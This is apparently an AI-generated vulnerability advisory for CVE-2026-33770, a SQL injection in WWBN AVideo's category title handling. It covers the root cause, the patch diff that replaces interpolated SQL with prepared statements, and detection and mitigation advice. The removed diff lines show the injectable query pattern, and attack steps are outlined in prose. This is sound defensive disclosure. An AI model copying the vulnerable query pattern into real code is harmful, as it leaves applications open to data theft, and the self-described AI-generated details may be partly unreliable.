CVE-2026-33770 Overview
CVE-2026-33770 is a SQL Injection vulnerability in WWBN AVideo, an open source video platform. In versions up to and including 26.0, the fixCleanTitle() static method in objects/category.php constructs a SQL SELECT query by directly interpolating both $clean_title and $id into the query string without using prepared statements or parameterized queries. An attacker who can trigger category creation or renaming with a crafted title value can inject arbitrary SQL commands, potentially leading to unauthorized data access or database manipulation.
Critical Impact
Authenticated attackers with category management privileges can exploit this SQL injection to extract sensitive data from the database, including user credentials and private video metadata.
Affected Products
- WWBN AVideo versions up to and including 26.0
Discovery Timeline
- 2026-03-27 - CVE CVE-2026-33770 published to NVD
- 2026-03-31 - Last updated in NVD database
Technical Details for CVE-2026-33770
Vulnerability Analysis
This SQL Injection vulnerability exists in the fixCleanTitle() static method within objects/category.php. The function is responsible for ensuring category names are unique when creating or renaming categories. The vulnerable code directly concatenates user-controlled input ($clean_title and $id) into a raw SQL query string without any sanitization or use of parameterized queries.
When a user with category management privileges creates or renames a category, the title value passes through this function. An attacker can craft a malicious title containing SQL metacharacters that break out of the intended query context, allowing them to append arbitrary SQL statements. This can be leveraged to read sensitive data from other database tables, bypass authentication checks, or enumerate the database schema.
Root Cause
The root cause is the use of direct string interpolation for constructing SQL queries instead of using prepared statements with parameterized queries. The vulnerable code builds the query by embedding $clean_title and $id variables directly into the SQL string using PHP's variable interpolation syntax ({$variable}), which provides no protection against SQL injection attacks.
Attack Vector
The attack requires network access and low-privilege authentication (PR:L). An attacker who can access the category management functionality (typically available to content moderators or administrators) can exploit this vulnerability by:
- Navigating to the category creation or editing interface
- Submitting a crafted category title containing SQL injection payloads
- The malicious input is passed to fixCleanTitle() where it gets interpolated into the SQL query
- The injected SQL executes with the privileges of the database connection
The following patch shows how the vulnerability was addressed by implementing prepared statements:
$original_title = $clean_title;
}
- $sql = "SELECT * FROM categories WHERE clean_name = '{$clean_title}' ";
+ $id = intval($id);
if (!empty($id)) {
- $sql .= " AND id != {$id} ";
+ $sql = "SELECT * FROM categories WHERE clean_name = ? AND id != ? LIMIT 1";
+ $res = sqlDAL::readSql($sql, "si", [$clean_title, $id], true);
+ } else {
+ $sql = "SELECT * FROM categories WHERE clean_name = ? LIMIT 1";
+ $res = sqlDAL::readSql($sql, "s", [$clean_title], true);
}
- $sql .= " LIMIT 1";
- $res = sqlDAL::readSql($sql, "", [], true);
$cleanTitleExists = sqlDAL::fetchAssoc($res);
sqlDAL::close($res);
if (!empty($cleanTitleExists)) {
Source: GitHub Commit Update
Detection Methods for CVE-2026-33770
Indicators of Compromise
- Unusual SQL error messages in application logs related to category operations
- Database query logs showing unexpected UNION, SELECT, or subquery patterns in category-related queries
- Anomalous access patterns to the category management endpoints
- Evidence of data exfiltration or unauthorized database reads in audit logs
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect SQL injection patterns in category name parameters
- Monitor database query logs for suspicious SQL syntax including UNION-based injection signatures
- Deploy runtime application self-protection (RASP) to detect SQL injection attempts at the application layer
- Review access logs for repeated requests to category creation/editing endpoints with unusual payloads
Monitoring Recommendations
- Enable detailed logging for all category management operations in AVideo
- Configure database auditing to track queries executed against the categories table
- Set up alerts for failed or malformed SQL queries originating from the application
- Monitor for authentication anomalies from accounts with category management privileges
How to Mitigate CVE-2026-33770
Immediate Actions Required
- Update WWBN AVideo to a version that includes commit 994cc2b3d802b819e07e6088338e8bf4e484aae4 or later
- Review database access logs for any signs of prior exploitation
- Restrict category management privileges to trusted administrators only
- Implement network-level access controls to limit exposure of the AVideo administrative interface
Patch Information
The vulnerability has been addressed in commit 994cc2b3d802b819e07e6088338e8bf4e484aae4. The fix refactors the SQL query in the fixCleanTitle() method to use prepared statements with proper parameter binding. The $id parameter is also explicitly cast to an integer using intval() as an additional defense layer. Organizations should update to a version containing this fix. Refer to the GitHub Security Advisory GHSA-584p-rpvq-35vf for official guidance.
Workarounds
- Temporarily disable category creation and renaming functionality until the patch is applied
- Implement input validation at the web server or WAF level to block SQL metacharacters in category titles
- Restrict database user permissions to limit the impact of potential SQL injection exploitation
- Place the AVideo instance behind a reverse proxy with request filtering capabilities
# Example: Restrict category management via .htaccess (temporary workaround)
<LocationMatch "/admin/category">
Order Deny,Allow
Deny from all
Allow from 192.168.1.0/24
</LocationMatch>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
